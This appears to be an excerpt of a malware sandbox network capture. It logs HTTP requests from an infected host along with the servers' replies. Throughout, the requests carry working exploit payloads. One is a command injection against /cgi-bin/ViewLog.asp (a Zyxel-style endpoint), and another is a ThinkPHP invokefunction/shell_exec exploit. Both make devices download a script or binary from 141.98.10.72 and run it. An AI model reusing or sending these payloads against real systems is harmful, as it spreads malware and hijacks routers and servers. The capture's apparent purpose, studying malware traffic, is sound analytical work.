                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:43.394601107 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:46.018440008 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:51.138202906 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:01.121922016 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1190192.168.2.145627694.123.120.1928080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.566320896 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1191192.168.2.145564694.123.46.2268080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.566456079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1192192.168.2.145523294.120.97.118080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.566668987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1193192.168.2.145370094.123.153.2318080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.566802979 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1194192.168.2.145000894.123.183.928080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.567986012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1195192.168.2.143876095.128.41.13980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.588990927 CET219INHTTP/1.1 400 Bad request
                                                        Content-length: 90
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1196192.168.2.1457542112.163.188.22180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.669059038 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1197192.168.2.1453204112.170.179.14480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:43.232798100 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:43.517878056 CET62INHTTP/1.0 400 Bad Request
                                                        Connection: Keep-Alive
                                                        Feb 14, 2024 09:35:43.517926931 CET83INData Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e
                                                        Data Ascii: Keep-Alive: timeout=20Content-Type: text/html<h1>Bad Request</h1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1198192.168.2.1433916112.166.178.22080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:43.233077049 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:43.518203020 CET35INHTTP/1.0 301 Redirect
                                                        Feb 14, 2024 09:35:43.518645048 CET377INData Raw: 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 37 3a 33 35 3a 34 33 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74
                                                        Data Ascii: Date: Wed Feb 14 17:35:43 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: (null)Location: http://127.0.0.1:8899/login.asp<html><head></head><body>This document has moved to a new <a href="http://


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1199192.168.2.1444620112.133.27.580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:43.255964994 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1200192.168.2.1436568112.124.52.16980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:43.314202070 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:43.681322098 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:43 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1201192.168.2.144401031.136.207.2198080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.064822912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:45.730443954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:47.010406017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:49.602516890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:54.722067118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:04.961920023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1202192.168.2.145227494.130.90.2148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.064858913 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:45.281562090 CET490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:35:45 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1203192.168.2.143982031.136.51.108080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.075742960 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:45.794490099 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:47.202440023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:50.114305973 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:55.746150970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:07.009601116 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1204192.168.2.144241831.136.67.2248080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.078589916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
